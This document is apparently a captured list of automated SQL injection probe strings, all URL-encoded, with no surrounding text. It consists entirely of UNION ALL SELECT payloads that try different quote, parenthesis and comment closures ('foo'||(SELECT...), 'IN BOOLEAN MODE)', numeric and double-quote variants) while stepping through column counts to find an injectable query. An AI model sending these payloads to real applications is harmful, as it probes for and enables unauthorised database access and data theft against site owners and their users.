foo%27%7C%7C%28SELECT%20%27itIY%27%20WHERE%204918%3D4918%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27GYLW%27%20WHERE%201174%3D1174%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27Owae%27%20WHERE%202044%3D2044%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20CUHj%20WHERE%204600%3D4600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20ZPcb%20WHERE%208838%3D8838%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20FRjF%20WHERE%205887%3D5887%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20TQhx%20WHERE%203289%3D3289%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20nsLm%20WHERE%204769%3D4769%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20BQZE%20WHERE%209426%3D9426%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20IiGT%20WHERE%206648%3D6648%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20pJUK%20WHERE%204013%3D4013%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20RjGB%20WHERE%206347%3D6347%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20IEEF%20WHERE%205550%3D5550%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27NuGZ%27%20WHERE%208586%3D8586%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27xTtU%27%20WHERE%207239%3D7239%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27GkDf%27%20WHERE%203642%3D3642%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27rwer%27%20WHERE%204059%3D4059%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27QWtU%27%20WHERE%203766%3D3766%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27qnjr%27%20WHERE%207369%3D7369%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27zCZm%27%20WHERE%206862%3D6862%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27nZqE%27%20WHERE%202352%3D2352%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27nDsb%27%20WHERE%206893%3D6893%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20%27oviQ%27%20WHERE%206004%3D6004%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -7069%29%20UNION%20ALL%20SELECT%207194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%2C7194%23 -6208%29%20UNION%20ALL%20SELECT%201994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%2C1994%23 -1161%29%20UNION%20ALL%20SELECT%205384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%2C5384%23 -4496%29%20UNION%20ALL%20SELECT%208244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%2C8244%23 -1767%29%20UNION%20ALL%20SELECT%206517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%2C6517%23 -6104%29%20UNION%20ALL%20SELECT%203593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%2C3593%23 -4142%29%20UNION%20ALL%20SELECT%207708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%2C7708%23 -7465%29%20UNION%20ALL%20SELECT%203780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%2C3780%23 -5925%29%20UNION%20ALL%20SELECT%204755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%23 -8507%29%20UNION%20ALL%20SELECT%201142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%2C1142%23 -8138%27%29%20UNION%20ALL%20SELECT%203384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%2C3384%23 -4736%27%29%20UNION%20ALL%20SELECT%207122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%2C7122%23 -3306%27%29%20UNION%20ALL%20SELECT%201991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%2C1991%23 -7844%27%29%20UNION%20ALL%20SELECT%201643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%2C1643%23 -7701%27%29%20UNION%20ALL%20SELECT%206744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%23 -2295%27%29%20UNION%20ALL%20SELECT%208907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%23 -5052%27%29%20UNION%20ALL%20SELECT%204736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%2C4736%23 -4865%27%29%20UNION%20ALL%20SELECT%205890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%2C5890%23 -4330%27%29%20UNION%20ALL%20SELECT%206312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%2C6312%23 -8797%27%29%20UNION%20ALL%20SELECT%204166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%2C4166%23 -3757%27%20UNION%20ALL%20SELECT%207594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%2C7594%23 -9140%27%20UNION%20ALL%20SELECT%202395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%23 -1342%27%20UNION%20ALL%20SELECT%203036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%2C3036%23 -8170%27%20UNION%20ALL%20SELECT%203177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%23 -3041%27%20UNION%20ALL%20SELECT%202935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%2C2935%23 -3913%27%20UNION%20ALL%20SELECT%203824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%2C3824%23 -6008%27%20UNION%20ALL%20SELECT%209346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%2C9346%23 -7851%27%20UNION%20ALL%20SELECT%204583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%2C4583%23 -4265%27%20UNION%20ALL%20SELECT%207788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%2C7788%23 -8681%27%20UNION%20ALL%20SELECT%205035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%2C5035%23 -9393%22%20UNION%20ALL%20SELECT%206680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%2C6680%23 -9127%22%20UNION%20ALL%20SELECT%203788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%2C3788%23 -8215%22%20UNION%20ALL%20SELECT%202702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%2C2702%23 -4382%22%20UNION%20ALL%20SELECT%206700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%2C6700%23 -9727%22%20UNION%20ALL%20SELECT%203554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%2C3554%23 -1457%22%20UNION%20ALL%20SELECT%207060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%2C7060%23 -3985%22%20UNION%20ALL%20SELECT%202160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%2C2160%23 -9475%22%20UNION%20ALL%20SELECT%206305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%2C6305%23 -3436%22%20UNION%20ALL%20SELECT%207076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%2C7076%23 -9942%22%20UNION%20ALL%20SELECT%209212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%2C9212%23 -1158%29%20UNION%20ALL%20SELECT%207265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%2C7265%23 -6035%29%20UNION%20ALL%20SELECT%208829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%23 -8914%29%20UNION%20ALL%20SELECT%207838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%2C7838%23 -8151%29%20UNION%20ALL%20SELECT%204458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%2C4458%23 -8506%29%20UNION%20ALL%20SELECT%206263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%2C6263%23 -8988%29%20UNION%20ALL%20SELECT%201771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%2C1771%23 -4913%29%20UNION%20ALL%20SELECT%201320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%23 -4430%29%20UNION%20ALL%20SELECT%208571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%2C8571%23 -5383%29%20UNION%20ALL%20SELECT%204703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%2C4703%23 -1382%29%20UNION%20ALL%20SELECT%203945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%2C3945%23 -1717%29%29%20UNION%20ALL%20SELECT%202896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%2C2896%23 -5697%29%29%20UNION%20ALL%20SELECT%209497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%2C9497%23 -1226%29%29%20UNION%20ALL%20SELECT%201482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%2C1482%23 -5613%29%29%20UNION%20ALL%20SELECT%207196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%2C7196%23 -2663%29%29%20UNION%20ALL%20SELECT%208195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%2C8195%23 